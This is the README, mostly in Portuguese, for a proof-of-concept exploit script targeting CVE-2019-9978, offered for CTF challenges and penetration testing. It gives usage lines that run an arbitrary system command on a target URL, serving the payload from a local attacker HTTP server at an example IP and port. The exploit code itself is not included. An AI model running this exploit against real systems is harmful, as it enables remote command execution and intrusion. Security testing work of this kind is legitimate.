
cve-2019-9978 PoC
Este é um script que permite explorar a vulnerabilidade CVE-2019-9978 de forma direta, destinado a ser usado em desafios Capture The Flag (CTF) ou como prova de conceito para testes de penetração.
pip install requests) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
Este código é apenas para fins educacionais e de teste. O uso não autorizado em sistemas sem a devida permissão é ilegal e antiético. Use-o com responsabilidade.